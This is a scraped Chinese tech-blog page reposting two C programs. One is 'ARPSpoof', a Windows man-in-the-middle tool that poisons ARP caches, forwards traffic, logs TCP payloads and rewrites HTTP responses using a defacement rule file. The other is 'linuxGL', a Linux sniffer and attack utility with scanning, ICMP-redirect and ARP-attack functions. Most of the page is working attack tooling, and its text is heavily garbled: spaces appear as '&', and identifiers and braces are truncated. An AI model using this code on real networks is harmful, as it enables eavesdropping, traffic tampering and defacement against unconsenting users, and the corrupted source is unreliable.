在线等ip1=(structitem*)malloc函数(c[k]=b[j ];
点击联系发帖人
时间:2011-12-16 22:25
& View Code
arpspoof.cpp
arpspoof.cpp:Code Content
#include&&stdio.h&
#include&&pcap.h&
#include&&winsock2.h&
#pragma&comment(lib,&&ws2_32.lib&)
#pragma&comment(lib,&&wpcap.lib&)
#include&&iphlpapi.h&
#include&&protoinfo.h&
#include&&spoof.h&
#include&&tcp.h&
#include&&scan.h&
#include&&replace.h&
//&存储要替换的字符串的链表结构
typedef&struct&tagSTRLINK
char&szOld[256];
char&szNew[256];
struct&tagSTRLINK&*
}STRLINK,&*PSTRLINK;
HANDLE&hThread[2];&//&两个发送RARP包的线程
unsigned&short&g_uP&//&要监视的端口号
pcap_t&*&//&网卡句柄
HANDLE&g_hE&//&捕捉&Ctrl+C
int&g_uM&//&欺骗标志&0&表示单向欺骗,&1表示双向欺骗
BOOL&bIsReplace&=&FALSE;&//&是否对转发的数据进行替换
BOOL&bIsLog&=&FALSE;&//&是否进行数据保存
char&szLogfile[MAX_PATH];&//&要保存数据的文件名
//&对应ARPSPOOF结构中的成员
unsigned&char&ucSelf[6],&ucIPA[6],&ucIPB[6];
char&szIPSelf[16],&szIPA[16],&szIPB[16],&szIPGate[16];
//&初始化链表
PSTRLINK&strLink&=&(PSTRLINK)&malloc(sizeof(STRLINK));
char&TcpFlag[6]={&'F','S','R','P','A','U'&};&//定义TCP标志位,分析数据包时用
BOOL&InitSpoof(char&**);
void&ResetSpoof();
void&Help();
//&格式化copy函数,主要是为了替换&'r',&'n'字符
BOOL&fstrcpy(char&*szSrc,&char&*szDst)
unsigned&int&i,&j;
for&(i&=&0,&j=0;&i&&&strlen(szSrc);&i++,&j++)
if&(szSrc[i]&==&'\'&&&&szSrc[i&+&1]&==&'r')&//&Replace&&r&
szDst[j]&=&'r';
else&if&(szSrc[i]&==&'\'&&&&szSrc[i&+&1]&==&'n')&//&Replace&&n&
szDst[j]&=&'n';
else&if&(szSrc[i]&!=&'n'&&&&szSrc[i]&!=&'�')
szDst[j]&=&szSrc[i];
return&TRUE;
szDst[j&+&1]&=&'�';&//&add&'�'
return&TRUE;
//&把文件中的规则存储到链表中
//&入口参数&szJobfile&==&&规则文件名
//&出口参数&strLink&&&==&&指向链表头的指针
BOOL&ReadJob(char&*szJobfile,&PSTRLINK&strLink)
char&szBuff[256],&*p&=&NULL;
if&((fp&=&fopen(szJobfile,&&rt&))&==&NULL)
printf(&Job&file&open&errorn&);
return&FALSE;
PSTRLINK&pTmp&=&strL&//&保存原指针
while&(fgets(szBuff,&sizeof(szBuff),&fp))
if&(strcmp(szBuff,&&----&))
memset(szBuff,&0,&sizeof(szBuff));
memset(strLink-&szOld,&0,&sizeof(strLink-&szOld));
fgets(szBuff,&sizeof(szBuff),&fp);
if&(!&fstrcpy(szBuff,&strLink-&szOld))
printf(&[!]&job&file&format&error&..n&);
return&FALSE;
fgets(szBuff,&sizeof(szBuff),&fp);
if&(strcmp(szBuff,&&----&))
memset(szBuff,&0,&sizeof(szBuff));
memset(strLink-&szNew,&0,&sizeof(strLink-&szNew));
fgets(szBuff,&sizeof(szBuff),&fp);
if&(!&fstrcpy(szBuff,&strLink-&szNew))
printf(&[!]&job&file&format&error&..n&);
return&FALSE;
printf(&Replace&Job&file&format&error,&
used&arpspoof&/n&release&a&new&job&filen&);
return&FALSE;
strLink-&next&=&(PSTRLINK)&malloc(sizeof(STRLINK));
strLink&=&strLink-&
strLink-&next&=&NULL;
fclose(fp);
strLink&=&pT&//&恢复原指针
return&TRUE;
//&把数据写入文件
//&入口参数:&szLogfile&==&&日志文件名&data&==&&指向数据块的空指针&size&==&&数据块大小
//&返回值类型&Boolean
BOOL&SaveLog(char&szLogfile[],&const&void&*data,&unsigned&int&size)
hFile&=&CreateFile(szLogfile,&GENERIC_WRITE,&FILE_SHARE_WRITE,&NULL,&
OPEN_ALWAYS,&FILE_ATTRIBUTE_NORMAL,&NULL);
if&(hFile&==&INVALID_HANDLE_VALUE)
return&FALSE;
SetFilePointer(hFile,&NULL,&NULL,&FILE_END);
WriteFile(hFile,&data,&size,&&dwBytes,&NULL);
CloseHandle(hFile);
return&TRUE;
//&捕获控制台事件的函数,主要是处理程序中断事务
BOOL&CtrlHandler(&DWORD&fdwCtrlType&)&
switch&(fdwCtrlType)&
//&Handle&the&CTRL-C&signal.&
&&&&case&CTRL_C_EVENT:&
&&&&case&CTRL_CLOSE_EVENT:&
&&&&case&CTRL_BREAK_EVENT:&&
&&&&case&CTRL_LOGOFF_EVENT:&
&&&&case&CTRL_SHUTDOWN_EVENT:
ResetSpoof();&//&&恢复欺骗主机的arp&cache
return&TRUE;
&&&&default:&
return&FALSE;
//&&为公用变量赋值,初始化参数
BOOL&InitSpoof(char&**argv)
//&IPSelf,&ucSelf&已经在打开网卡时初始化过了
memset(ucIPA,&0xff,&6);
memset(ucIPB,&0xff,&6);
memset(szIPA,&0&,16);
memset(szIPB,&0&,16);
if&(!GetMac((char&*)&argv[1],&ucIPA))
printf(&[!]&Error&Get&Mac&Address&of&%sn&,&argv[1]);
return&FALSE;
if&(!GetMac((char&*)&argv[2],&ucIPB))
printf(&[!]&Error&Get&Mac&Address&of&%sn&,&argv[2]);
return&FALSE;
strcpy((char&*)&szIPA,&(char&*)&argv[1]);
strcpy((char&*)&szIPB,&(char&*)&argv[2]);
StaticARP((unsigned&char&*)&szIPA,&ucIPA);
StaticARP((unsigned&char&*)&szIPB,&ucIPB);
g_uPort&=&atoi(argv[3]);
g_uMode&=&atoi(argv[5]);
return&TRUE;
//&显示ARP欺骗信息&(调试用)
//&加延迟是为了等待参数传递,因为函数公用一个ARPSPOOF变量
void&SpoofInfo(PARPSPOOF&arpspoof)
printf(&Spoof&%s&%s&MAC&%.2X-%.2X-%.2X-%.2X-%.2X-%.2Xn&,
arpspoof-&szTarget,&arpspoof-&szIP,&
arpspoof-&ucPretendMAC[0],&arpspoof-&ucPretendMAC[1],
arpspoof-&ucPretendMAC[2],&arpspoof-&ucPretendMAC[3],
arpspoof-&ucPretendMAC[4],&arpspoof-&ucPretendMAC[5]
Sleep(100);
//&处理ARP欺骗例程,开始Spoof
void&ARPSpoof()
PARPSPOOF&arpspoof&=&(PARPSPOOF)&malloc(sizeof(ARPSPOOF));
arpspoof-&adhandle&=&
memcpy(arpspoof-&ucSelfMAC,&ucSelf,&6);
//&Spoof&IP1&-&&IP2
strcpy((char&*)&arpspoof-&szTarget,&szIPA);
memcpy(arpspoof-&ucTargetMAC,&ucIPA,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPB);
memcpy(arpspoof-&ucIPMAC,&ucIPB,&6);
memcpy(arpspoof-&ucPretendMAC,&ucSelf,&6);
hThread[0]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
SpoofInfo(arpspoof);
if&(g_uMode&==&1)&//&如果双向欺骗
//&Spoof&IP2&-&&IP1
strcpy((char&*)&arpspoof-&szTarget,&szIPB);
memcpy(arpspoof-&ucTargetMAC,&ucIPB,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPA);
memcpy(arpspoof-&ucIPMAC,&ucIPA,&6);
memcpy(arpspoof-&ucPretendMAC,&ucSelf,&6);
hThread[1]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
SpoofInfo(arpspoof);
//&重置ARP欺骗,恢复受骗主机的ARP&cache
//&&&&&和ARPSpoof做相反操作
void&ResetSpoof()
printf(&[+]&Reseting&.....n&);
TerminateThread(hThread[0],&0);
TerminateThread(hThread[1],&0);
PARPSPOOF&arpspoof&=&(PARPSPOOF)&malloc(sizeof(ARPSPOOF));
arpspoof-&adhandle&=&
strcpy((char&*)&arpspoof-&szTarget,&szIPA);
memcpy(arpspoof-&ucTargetMAC,&ucIPA,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPB);
memcpy(arpspoof-&ucIPMAC,&ucIPB,&6);
memcpy(arpspoof-&ucPretendMAC,&ucIPB,&6);
memcpy(arpspoof-&ucSelfMAC,&ucSelf,&6);
hThread[0]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
if(g_uMode&==&1)
Sleep(200);
strcpy((char&*)&arpspoof-&szTarget,&szIPB);
memcpy(arpspoof-&ucTargetMAC,&ucIPB,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPA);
memcpy(arpspoof-&ucIPMAC,&ucIPA,&6);
memcpy(arpspoof-&ucPretendMAC,&ucIPA,&6);
hThread[1]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
printf(&[-]&Sleep&5s&&);
for(int&i&=&0;&i&&&12;&i++,&Sleep(300))
printf(&.&);
printf(&n&);
TerminateThread(hThread[0],&0);
TerminateThread(hThread[1],&0);
//&pcap_breakloop后,所有对网卡的操作都会使用程序中止,切记
pcap_breakloop(adhandle);&
//&替换数据包中内容,&重新计算校验和
void&ReplacePacket(const&u_char&*pkt_data,&unsigned&int&pkt_len)
ETHeader&*
&&&&IPHeader&*
&&&&TCPHeader&*
&&&&u_int&ip_
eh&=&(ETHeader&*)&pkt_
ih&=&(IPHeader&*)&(pkt_data&+&14);
ip_len&=&(ih-&iphVerLen&&&0xf)&*&4;
th&=&(TCPHeader&*)&((u_char*)ih&+&ip_len);
//&得到TCP数据包的指针和长度
unsigned&char&*datatcp&=&(unsigned&char&*)&ih&+&sizeof(_IPHeader)&
+&sizeof(struct&_TCPHeader);
int&lentcp&=&ntohs(ih-&ipLength)&-&(sizeof(_IPHeader)&+&sizeof(_TCPHeader));
//&开始替换数据内容,重新计算校验和
PSTRLINK&pTmp&=&strL
int&i&=&0;
while&(pTmp-&next)
//&开始匹配规则进行替换
if&(Replace(datatcp,&lentcp,&pTmp-&szOld,&pTmp-&szNew))
printf(&&&&&Applying&rul&%s&==&&%sn&,&pTmp-&szOld,&pTmp-&szNew);
pTmp&=&pTmp-&
if&(i&&0)&//&如果数据包被修改,重新计算校验和
printf(&[*]&Done&%d&replacements,&forwarding&packet&of&size&%dn&,
i,&pkt_len);
ih-&ipChecksum&=&0;
th-&checksum&=&0;
ih-&ipChecksum&=&checksum((USHORT&*)ih,&sizeof(_IPHeader));
ComputeTcpPseudoHeaderChecksum(ih,&th,&(char&*)datatcp,&lentcp);
printf(&[*]&Forwarding&untouched&packet&of&size&%dn&,&pkt_len);
//&分析显示数据包内容,或者保存至文件
void&AnalyzePacket(const&u_char&*pkt_data,&unsigned&int&pkt_len)
ETHeader&*
&&&&IPHeader&*
&&&&TCPHeader&*
&&&&u_int&ip_
char&szSource[16],szDest[16];
&&&&u_short&sport,&
eh&=&(ETHeader&*)&pkt_
ih&=&(IPHeader&*)&(pkt_data&+&14);
ip_len&=&(ih-&iphVerLen&&&0xf)&*&4;
th&=&(TCPHeader&*)&((u_char*)ih&+&ip_len);
sport&=&ntohs(th-&sourcePort);
dport&=&ntohs(th-&destinationPort&);
unsigned&char&*datatcp&=&(unsigned&char&*)&ih&+&sizeof(_IPHeader)&
+&sizeof(struct&_TCPHeader);
int&lentcp&=&ntohs(ih-&ipLength)&-&(sizeof(_IPHeader)&+&sizeof(_TCPHeader));
wsprintf(szSource,&&%d.%d.%d.%d&,
ih-&ipSourceByte.byte1,&ih-&ipSourceByte.byte2,
ih-&ipSourceByte.byte3,&ih-&ipSourceByte.byte4);
wsprintf(szDest,&&%d.%d.%d.%d&,
ih-&ipDestinationByte.byte1,&ih-&ipDestinationByte.byte2,
ih-&ipDestinationByte.byte3,&ih-&ipDestinationByte.byte4);
//&分析数据包
char&szTmpStr[85],&szTmpFlag[7];
szTmpFlag[6]&=&'�';
unsigned&char&FlagMask&=&1;
for(int&i=0;&i&6;&i++&)
if&((th-&flags)&&&FlagMask)
szTmpFlag[i]&=&TcpFlag[i];&
szTmpFlag[i]&=&'-';
FlagMask&=&FlagMask&&&&1;&
wsprintf(szTmpStr,
&nTCP&%15s-&%-15s&Bytes=%-4d&TTL=%-3d&Port:%d-&%d&%sn&,
szSource,&szDest,&lentcp,&ih-&ipTTL,&sport,&dport,&szTmpFlag);
printf(&%s&,&szTmpStr);
if&(bIsLog)&//&写入文件
SaveLog(szLogfile,&szTmpStr,&strlen(szTmpStr));
SaveLog(szLogfile,&datatcp,&lentcp);
//&&显示数据包的内容
for&(i&=&0;&i&&&&i++)
if&((*(datatcp+i)&&&0x000000ff)&!=&0x07)&&//&过滤掉可恶的Beep字符
printf(&%c&,&*(datatcp+i));
//&&处理转发、修改、保存数据包的例程
//&&程序的核心部分
void&ForwardPacket(pcap_t&*adhandle,&const&u_char&*pkt_data,&unsigned&int&pkt_len)
ETHeader&*
&&&&IPHeader&*
&&&&TCPHeader&*
&&&&u_int&ip_
char&szSource[16],szDest[16];
&&&&u_short&sport,&
eh&=&(ETHeader&*)&pkt_
if(eh-&type&!=&htons(ETHERTYPE_IP))
&//&只转发IP包
ih&=&(IPHeader&*)&(pkt_data&+&14);&//找到IP头的位置,14为以太头的长度
ip_len&=&(ih-&iphVerLen&&&0xf)&*&4;&
th&=&(TCPHeader&*)&((u_char*)ih&+&ip_len);&//&找到TCP的位置
//&将端口信息从网络型转变为主机顺序
sport&=&ntohs(th-&sourcePort);
dport&=&ntohs(th-&destinationPort&);
//&得到源IP地址,目标IP地址
wsprintf(szSource,&&%d.%d.%d.%d&,
ih-&ipSourceByte.byte1,&ih-&ipSourceByte.byte2,
ih-&ipSourceByte.byte3,&ih-&ipSourceByte.byte4);
wsprintf(szDest,&&%d.%d.%d.%d&,
ih-&ipDestinationByte.byte1,&ih-&ipDestinationByte.byte2,
ih-&ipDestinationByte.byte3,&ih-&ipDestinationByte.byte4);
//&开始过滤要转发的数据包
if&(strcmp(szDest,&szIPSelf)&!=&0&&&&memcmp(ucSelf,&eh-&dhost,6)&==&0)
//&rebuild&IPA&-&&IPB
if&(memcmp(eh-&shost,&ucIPA,&6)&==&0)
//&修改以太网头
memcpy(eh-&shost,&eh-&dhost,&6);
memcpy(eh-&dhost,&ucIPB,&6);
if&(ih-&ipProtocol&==&PROTO_TCP&&&&dport&==&g_uPort)
if&(bIsReplace)&//&是否替换
printf(&[+]&Caught&%15s:%-4d&-&&%s:%dn&,&szSource, sport,&szDest,&dport);
ReplacePacket(pkt_data,&pkt_len);
printf(&[*]&Forwarding&untouched&packet&of&size&%dn&,&pkt_len);
AnalyzePacket(pkt_data,&pkt_len);
if&(pcap_sendpacket(adhandle,&(const&unsigned&char&*)&pkt_data,&pkt_len)&&&0)
printf(&[!]&Forward&thread&send&packet&errorn&);
//&rebuild&IPB&-&&IPA
else&if&(memcmp(eh-&shost,&ucIPB,&6)&==&0)
memcpy(eh-&shost,&eh-&dhost,&6);
memcpy(eh-&dhost,&ucIPA,&6);
if&(ih-&ipProtocol&==&PROTO_TCP&&&&sport&==&g_uPort)
if&(bIsReplace)
printf(&[+]&Caught&%15s:%-4d&-&&%s:%dn&,&szSource, sport,&szDest,&dport);
ReplacePacket(pkt_data,&pkt_len);
printf(&[*]&Forwarding&untouched&packet&of&size&%dn&,&pkt_len);
AnalyzePacket(pkt_data,&pkt_len);
if(pcap_sendpacket(adhandle,&(const&unsigned&char&*)&pkt_data,&pkt_len)&&&0)
printf(&[!]&Forward&thread&send&packet&errorn&);
//&pcap_loop的回调函数
//&把接收到的数据传给ForwardPacket函数处理
void&packet_handler(u_char&*param,&const&struct&pcap_pkthdr&*header,&const&u_char&*pkt_data)
ForwardPacket(adhandle,&pkt_data,header-&len);
//&释放一个实例规则文件
int&ReleaseJob(const&char&*szName)
if&((fp&=&fopen(&job.txt&,&w&))&==&NULL)
fputs(&----nHTTP/1.n----nHTTP/1.1&200&OK\r\n&&
&Server:&CoolDiyer's&Hack&IIS\r\nContent-Length:&27\r\n&&
&Connection:&close\r\nContent-Type:&text/html\r\n\r\n&&
&Hack&by&cooldiyer&noframes&n----&,&fp);
fclose(fp);
//&主函数,主要处理参数的初始化
int&main(int&argc,&char&*argv[])
printf(&ARPSpoof&Ver&3.1b&by&CoolDiyern&);
if&(argc&&1)
if&(argv[1][1]&==&'l')&//&列出可用的网卡
ListAdapters();
if&(argv[1][1]&==&'n')&//&释放一个示例规则文件&job.txt
if&(ReleaseJob(&job.txt&))
printf(&[+]&Replace&Job&file&job.txt&release&success...n&);
printf(&[!]&Release&job&file&errorn&);
return&-1;
if&(argc&==&4&&&&argv[1][1]&==&'s')
EnumLanHost(argv[2],&argv[3]);
if&(argc&&&6)&//&参数不正确,显示使用帮助
//&打开网卡,初始化szIPSelf,&ucSelf,&szIPGate变量
if&((adhandle&=&OpenAdapter(atoi(argv[4]),&szIPSelf,&ucSelf,&szIPGate))&==&NULL)
printf(&[!]&Open&adatper&error!n&);
return&FALSE;
//&初始化其它变量,转入核心例程
if&(InitSpoof(argv))
if&(argc&==&7&&&&strcmpi(argv[6],&&/reset&)&==&0)&//&启用恢复线程,5秒后退出程序
if&(g_uMode&==&1)
printf(&[*]&Reset&&%s&&-&&%sn&,&szIPA&,szIPB);
printf(&[*]&Reset&&%s&--&&%sn&,&szIPA&,szIPB);
ResetSpoof();
else&if&(argc&&5&)
SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler,&TRUE);
if&(argc&==&8&&&&argv[6][1]&==&'r')&//&如果是要替换转发内容
if&(ReadJob(argv[7],&strLink))&//&加载规则文件,并显示替换规则
PSTRLINK&pTmp&=&strL
while&(pTmp-&next)
printf(&[*]&Parsing&rul&%s&==&&%sn&,&pTmp-&szOld,&pTmp-&szNew);
pTmp&=&pTmp-&
bIsReplace&=&TRUE;
printf(&[+]&Loaded&%d&rules...n&,&i);
return&-1;
if&(argc&==&8&&&&argv[6][1]&==&'s')&//&&是否保存数据到文件
strcpy(szLogfile,&argv[7]);
bIsLog&=&TRUE;
printf(&[+]&Save&log&to&%sn&,&szLogfile);
if&(g_uMode&==&1)&//&&双向欺骗
printf(&[*]&Spoofing&&%s&&-&&%sn&,&szIPA&,szIPB);
else&//&单向欺骗
printf(&[*]&Spoofing&&%s&--&&%sn&,&szIPA&,szIPB);
if&(!bIsReplace)&//&只转发,不替换
printf(&[+]&Using&fixed&forwarding&thread.n&);
//&开始主要例程,欺骗并转发处理数据包
ARPSpoof();
pcap_loop(adhandle,&0,&packet_handler,&NULL);
pcap_close(adhandle);
//&帮助函数,对一些参数的说明和程序的使用
void&Help()
printf(&Usage:n&);
printf(&&&ArpSpoof&&IP1&&&IP2&&&PORT&&&AdpNum&&&Mode&&/[r|s]&&File&n&);
printf(&&&ArpSpoof&/s&&IP&&&Mask&n&);
printf(&&&ArpSpoof&/ln&);
printf(&tMode&Options:ntt0tIP1&--&&IP2n&);
printf(&tt1tIP1&&-&&IP2n&);
printf(&Examples:n&);
printf(&t&&ArpSpoof&192.168.0.1&192.168.0.8&80&2&1&/r&job.txtn&);
printf(&t&&#&Spoof&192.168.0.1&&-&&192.168.0.8:80&with&rulenn&);
printf(&t&&ArpSpoof&192.168.0.1&192.168.0.8&21&2&1&/s&sniff.logn&);
printf(&t&&#&Spoof&192.168.0.1&&-&&192.168.0.8:80&save&to&lognn&);
printf(&t&&ArpSpoof&192.168.0.1&192.168.0.8&80&2&0&/RESETn&);
printf(&t&&#&Reset&192.168.0.1&--&&192.168.0.8:80nn&);
printf(&t&&ArpSpoof&/s&192.168.0.1&255.255.255.0n&);
printf(&t&&#&Scan&lan&hostnn&);
printf(&t&&ArpSpoof&/ln&);
printf(&t&&#&Lists&adaptersnn&);
printf(&t&&ArpSpoof&/nn&);
printf(&t&&#&Release&a&new&replace&rule&filen&);
CopyRight & 2008- All Rights reserved.&&苏ICP备博客访问: 329828
博文数量: 2120
注册时间:
鏆傛棤浠嬬粛
ITPUB论坛APP
ITPUB论坛APP
APP发帖 享双倍积分
IT168企业级官微
微信号:IT168qiye
系统架构师大会
微信号:SACC2013
分类: Linux
最后的纪念---linuxGL(转)[@more@]
/*作品名:linuxGL作者:陈兴华来自:广州学校:THXY College班别:网络042班*/#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#define __FAVOR_BSD#include#ifdef __linux#include#include#else#include#include#include#include#endif#define BUFSIZE 4096#define PACKET_LEN 72#define MAXSIZE 4096#define OPTNUM 8#define ON 1#define OFF 0enum{ETHER,ARP,IP,TCP,UDP,ICMP,DUMP,ALL};enum{OPEN,CLOSE};enum{CMD_NAME,CMD_SELECT,START_IP,LAST_IP};enum{CMD_NAME1,CMD_SELECT2,DST_IP,START_PORT,LAST_PORT};enum {CMD_NAME2,S3,TARGET_IP,OLD_ROUTER,NEW_ROUTER,DST_IP1 };enum{CMD_NAME3,S4,DST_IP3};enum{CMD_NAME5,IFNAME,DST_IP4,MAC_ADDR,OPTION};enum{NORMAL,REPLY,REQUEST};#ifndef _linux_/*实现使用BPF作为访问数据链路层的手段用于FreeBSD系统中*/int open_bpf(char *ifname); #endifvoid make_icmp8_packet(struct icmp *icmp,int len,int n); /*ICMP头部*/void make_udp_header( struct udphdr *udp); /*UDP头部*/ void make_ip_header(struct ip *ip,int target_ip,int dst_ip,int proto,int iplen);void make_ip_header2(struct ip *ip,int srcip, int dstip,int iplen); /*IP头部*/void make_icmp5_header(struct icmp *icmp,u_int gw_ip); void make_ethernet(struct ether_header *eth,u_char *ether_dhost, /* 以太帧头部*/u_char *ether_shost,u_short ether_type);void make_arp(struct ether_arp *arp,int op,u_char *arp_sha, /* ARP头部*/u_char *arp_spa,u_char *arp_tha, u_char *arp_tpa);u_short checksum(u_short *data,int len);void tvsub(struct timeval *out,struct timeval *in); /*计算往返时间*/void scan_host(int argc,char *argv[]); /*主机查找*/void scan_port(int argc,char *argv[]); /*端口查找*/void scan_uport(int argc,char *argv[]); /*UDP端口查找*/void print_ethernet(struct ether_header *eth); /*打印以太数据*/void print_arp(struct ether_arp *arp); /*打印ARP*/void print_ip(struct ip *ip); /*打印IP数据*/void print_icmp(struct icmp *icmp); /*打印ICMP数据*/void print_tcp(struct tcphdr *tcp); /*打印TCP数据*/void print_udp(struct udphdr *udp); /*打印UDP数据*/void dump_packet(unsigned char *buff,int len); /*打印格式*/void kill_serve(int argc, char *argv[]); /*关闭或开启服务*/void on(int argc,char *argv[],char *server_save,FILE *tmp_s); /*开启服务*/void off(int argc,char *argv[],char *server_save,FILE *tmp_s); /*关闭服务*/char* yi_wei(char *server_save,int flag); /*关闭或开启服务中字符的移位*/void redirect(int argc,char *argv[]); /*ICMP重定向*/void scan_route(int argc,char *argv[]);/*查找路由*/void m_arp(int argc,char *argv[]); /*ARP操作*/char *mac_ntoa(u_char *d);/*将数组中存储的MAC地址变换为字符串*/char *tcp_ftoa(int flag); /*将TCP报头的协议标志变换为字符串*/char *ip_ttoa(int flag);/*将IP报头的TOS变为字符串*/char *ip_ftoa(int flag);/*将IP报头的段位变换为字符串*/struct packet_udp{};int main(int argc,char **argv){struct ether_header *struct ether_arp *struct ip *struct icmp *struct tcphdr *struct udphdr *char buff[MAXSIZE];char *p;char *char ifname[256]="x10";int opt[OPTNUM];#ifndef _linux_int bpf_struct bpf_hdr *#endifopt[ETHER]=OFF;opt[ARP]=ON;opt[IP]=ON;opt[TCP]=ON;opt[UDP]=ON;opt[ICMP]=ON;opt[DUMP]=OFF;opt[ALL]=OFF;while( (c=getopt(argc,argv,"mtruoskaei:p:dh"))!=EOF ){switch(c){case 'k':kill_serve(argc,argv);case 'm':m_arp(argc,argv);case 't':scan_route(argc,argv);case 'r':redirect(argc,argv);case 'u':scan_uport(argc,argv);case 'o':scan_port(argc,argv);case 's':scan_host(argc,argv);case 'a':opt[ALL]=ON;case 'i':strcpy(ifname,optarg);case 'e':opt[ETHER]=ON;case 'd':opt[DUMP]=ON;case 'p':opt[ARP]=OFF;opt[IP]=OFF;opt[TCP]=OFF;opt[UDP]=OFF;opt[ICMP]=OFF;optind--;while(argv[optind]!=NULL && argv[optind][0]!='-'){if(strcmp(argv[optind],"arp")==0)opt[ARP]=ON;else if(strcmp(argv[optind],"ip")==0)opt[IP]=ON;else if(strcmp(argv[optind],"tcp")==0)opt[TCP]=ON;else if(strcmp(argv[optind],"udp")==0)opt[UDP]=ON;else if(strcmp(argv[optind],"icmp")==0)opt[ICMP]=ON;else if(strcmp(argv[optind],"other")==0);else{exit(0);}optind++;} default:fprintf(stderr,"no argument my Master linuxcici");exit(0); }}if(optind<argc){while(optind<argc)printf("%s",argv[optind++]);printf("
");fprintf(stderr,"no argument or wrong my Master linuxcici
");exit(0);}#ifdef __linuxif( (s=socket(AF_INET,SOCK_PACKET,htons(ETH_P_ALL)))<0 ){perror("socket");exit(0);}if(strcmp(ifname,"x10")!=0) {memset(&sa,0,sizeof(sa));sa.sa_family=AF_INET;strcpy(sa.sa_data,ifname);if(bind(s,&sa,sizeof(sa))<0){perror("bind");exit(0);}}#elseif((s=open_bpf(ifname))<0)exit(0);bpf_len=0;#endifwhile(1){#ifndef __linuxif(bpf_len<=0){if( (bpf_len=read(s,buff,MAXSIZE))<0 ){perror("read");exit(0);}bp=(struct bpf_hdr *)}else{bp=(struct bpf hdr *)( (char *)bp+bp->bh_hdrlen+bp->bh_caplen);bp=(struct bpf hdr *)BPF_WORDALIGN((int)bp);}p=po=(char *)bp+bp->bh_len=bp->bh_#ifdef DEBUGprintf("bpf_len=%d,",bpf_len);printf("hdrlen=%d,",bp->hdrlen);printf("caplen=%d,",bp->bh_caplen);printf("datalen=%d
",bp->bh_datalen);#endif bpf_len-=BPF_WORDLIGN(bp->bh_hdrlen+bp->bh_caplen); #else if((len=read(s,buff,MAXSIZE))<0){perror("read");exit(0);}p= po=#endifdisp=OFF;eth=(struct ether_header *)p;p=p+sizeof(struct ether_header);if(ntohs(eth->ether_type)==ETHERTYPE_ARP){if(opt[ARP]==ON) {if(opt[ETHER]==ON)print_ethernet(eth);arp=(struct ether_arp *)p;print_arp(arp);disp=ON;}}else if (ntohs(eth->ether_type)==ETHERTYPE_IP){ip=(struct ip *)p;p=p+((int)(ip->ip_hl)<<2);if(opt[IP]==ON && opt[TCP]==OFF &&opt[UDP]==OFF && opt[ICMP]==OFF){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);disp=ON;}switch(ip->ip_p){case IPPROTO_TCP:tcp=(struct tcphdr *)p;# ifdef _FAVOR_BSD_p=p+((int)(tcp->th_off)<<2);#elsep=p+((int)(tcp->doff)<<2);#endifif(opt[TCP]==ON){if(opt[IP]==ON){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);}print_tcp(tcp);disp=ON;}case IPPROTO_ICMP:icmp=(struct icmp *)p;p=p+sizeof(struct udphdr);if(opt[ICMP]==ON){if(opt[IP]==ON){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);}print_icmp(icmp);disp=ON;}default:if(opt[ALL]==ON) {if(opt[IP]==ON){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);}printf("Protocol:unknow
");disp=ON;}}}else{if(opt[ALL]==ON){if(opt[ETHER]==ON)print_ethernet(eth);printf("protocol unknow
");disp=ON;}}if(disp==ON) {if(opt[DUMP]==ON)dump_packet(po,len);printf("
");}}return EXIT_SUCCESS; }/***************************** arp_attack ************************************/void m_arp(int argc,char *argv[]){struct ether_header *struct ether_arp *char recv_buff[4096];char send_buff[4096];char *char *char *char mac_addr[6];int tmp[6];#ifndef __linuxstruct bpf_hdr *int bpf_#else#endifu_int dst_char ifname[256];flag=NORMAL;if(argc==5){if(strcmp(argv[OPTION],"reply")==0)flag=REPLY;else if(strcmp(argv[OPTION],"request")==0)flag=REQUEST;else{exit(0);}}else if (argc!=4){exit(0);}strcpy(ifname,argv[IFNAME]);dst_ip=inet_addr(argv[DST_IP4]);if(sscanf(argv[MAC_ADDR],"%x:%x:%x:%x:%x:%x",&tmp[0],&tmp[1],&tmp[1],&tmp[3],&tmp[4],&tmp[5])!=6){printf("MAC address error %s
",argv[MAC_ADDR]);exit(0);}for(i=0;i<6;i++)mac_addr[i]=tmp[i];#ifdef __linuxif( (s=socket(PF_PACKET,SOCK_PACKET,htons(ETH_P_ALL)))<0 ){perror("socket");exit(0);}memset(&sa,0,sizeof(sa));sa.sa_family=PF_PACKET;strcpy(sa.sa_data,ifname);if(bind(s,&sa,sizeof(sa))<0){perror("bind");exit(0);}#elseif( (s=open_bpf(ifname))<0 )exit(0);bpf_len=0;#endifwhile(1){#ifndef __linuxif(bpf_len<=0){if( (bpf_len=read(s,recv_buff,4096))<0 ){perror("read");exit(0);}bp=(struct bpf_hdr *)recv_}else{bp=(struct bpf_hdr *)((char *)bp+bp->bh_hdrlen);bp=(struct bpf_hdr *)BPF_WORDALIGH ((int)bp) ;}rp=rpo=(char *)bp+bp->bh_len=bp->bh_#ifdef DEBUGprintf("bpf_len=%d
",bpf_len);printf("hdrlen=%d
",bp->bh_hdrlen);printf("caplen=%d
",bp->caplen);printf("datalen=%d
